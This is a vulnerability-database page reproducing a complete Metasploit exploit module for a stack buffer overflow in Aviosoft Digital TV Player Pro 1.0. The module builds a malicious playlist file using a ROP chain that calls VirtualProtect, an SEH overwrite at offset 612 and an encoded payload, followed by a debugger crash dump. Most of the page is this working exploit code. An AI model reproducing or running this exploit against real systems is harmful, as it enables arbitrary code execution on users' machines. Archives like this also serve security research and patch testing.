Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Aviosoft Digital TV Player Professional 1.0 Buffer Overflow

🗓️ 13 Nov 2011 00:00:00Reported by sinn3rType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 27 Views

Buffer Overflow in Aviosoft Digital TV Player Pro v1.x allows arbitrary code execution

Code
`##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GoodRanking  
  
include Msf::Exploit::FILEFORMAT  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow",  
'Description' => %q{  
This module exploits a vulnerability found in Aviosoft Digital TV Player  
Pro version 1.x. An overflow occurs when the process copies the content of a  
playlist file on to the stack, which may result aribitrary code execution under  
the context of the user.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'modpr0be', #Initial discovery, poc  
'sinn3r', #Metasploit  
],  
'References' =>  
[  
['OSVDB', '77043'],  
['URL', 'http://www.exploit-db.com/exploits/18096/'],  
],  
'Payload' =>  
{  
'BadChars' => "\x00\x0a\x1a",  
'StackAdjustment' => -3500,  
},  
'DefaultOptions' =>  
{  
'ExitFunction' => "seh",  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[  
'Aviosoft DTV Player 1.0.1.2',  
{  
'Ret' => 0x6130534a, #Stack pivot (ADD ESP,800; RET)  
'Offset' => 612, #Offset to SEH  
'Max' => 5000 #Max buffer size  
}  
],  
],  
'Privileged' => false,  
'DisclosureDate' => "Nov 9 2011",  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('FILENAME', [false, 'The playlist name', 'msf.plf'])  
], self.class)  
end  
  
def junk(n=1)  
return [rand_text_alpha(4).unpack("L")[0]] * n  
end  
  
def nops(rop=false, n=1)  
return rop ? [0x61326003] * n : [0x90909090] * n  
end  
  
def exploit  
rop = [  
nops(true, 10), #ROP NOP  
0x6405347a, #POP EDX # RETN (MediaPlayerCtrl.dll)  
0x10011108, #ptr to &VirtualProtect  
0x64010503, #PUSH EDX # POP EAX # POP ESI # RETN (MediaPlayerCtrl.dll)  
junk,  
0x6160949f, #MOV ECX,DWORD PTR DS:[EDX] # POP ESI (EPG.dll)  
junk(3),  
0x61604218, #PUSH ECX # ADD AL,5F # XOR EAX,EAX # POP ESI # RETN 0C (EPG.dll)  
junk(3),  
0x6403d1a6, #POP EBP # RETN (MediaPlayerCtrl.dll)  
junk(3),  
0x60333560, #& push esp # ret 0c (Configuration.dll)  
0x61323EA8, #POP EAX # RETN (DTVDeviceManager.dll)  
0xA13977DF, #0x00000343-> ebx  
0x640203fc, #ADD EAX,5EC68B64 # RETN (MediaPlayerCtrl.dll)  
0x6163d37b, #PUSH EAX # ADD AL,5E # POP EBX # RETN (EPG.dll)  
0x61626807, #XOR EAX,EAX # RETN (EPG.dll)  
0x640203fc, #ADD EAX,5EC68B64 # RETN (MediaPlayerCtrl.dll)  
0x6405347a, #POP EDX # RETN (MediaPlayerCtrl.dll)  
0xA13974DC, #0x00000040-> edx  
0x613107fb, #ADD EDX,EAX # MOV EAX,EDX # RETN (DTVDeviceManager.dll)  
0x60326803, #POP ECX # RETN (Configuration.dll)  
0x60350340, #&Writable location  
0x61329e07, #POP EDI # RETN (DTVDeviceManager.dll)  
nops(true), #ROP NOP  
0x60340178, #POP EAX # RETN  
nops, #Regular NOPs  
0x60322e02 #PUSH # RETN  
].flatten.pack("V*")  
  
buf = ''  
buf << rand_text_alpha(target['Offset']-buf.length)  
buf << [target.ret].pack('V*')  
buf << rand_text_alpha(136)  
buf << rop  
buf << make_nops(32)  
buf << payload.encoded  
buf << rand_text_alpha(target['Max']-buf.length)  
  
file_create(buf)  
end  
end  
  
=begin  
eax=00001779 ebx=047a02c0 ecx=000001f4 edx=047a6814 esi=047a77bc edi=00130000  
eip=6400f6f0 esp=0012f038 ebp=00000001 iopl=0 nv up ei pl nz na pe nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206  
MediaPlayerCtrl!DllCreateObject+0x220:  
6400f6f0 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]  
0:000> !exchain  
0012f3bc: *** WARNING: Unable to verify checksum for C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\DTVDeviceManager.dll  
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Aviosoft\Aviosoft DTV Player Pro\DTVDeviceManager.dll -   
DTVDeviceManager+534a (6130534a)  
Invalid exception stack at 41414141  
0:000> !address edi  
00130000 : 00130000 - 00003000  
Type 00040000 MEM_MAPPED  
Protect 00000002 PAGE_READONLY  
State 00001000 MEM_COMMIT  
Usage RegionUsageIsVAD  
0:000> !address esi  
047a0000 : 047a0000 - 0000b000  
Type 00020000 MEM_PRIVATE  
Protect 00000004 PAGE_READWRITE  
State 00001000 MEM_COMMIT  
Usage RegionUsageHeap  
Handle 013c0000  
=end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Nov 2011 00:00Current
0.5Low risk
Vulners AI Score0.5
aviosoft digital tv player professionalbuffer overflowarbitrary code executionstack buffer overflowexploitvulnerabilitymetasploit frameworkremote exploitplaylist filesecurityinformation disclosure.
27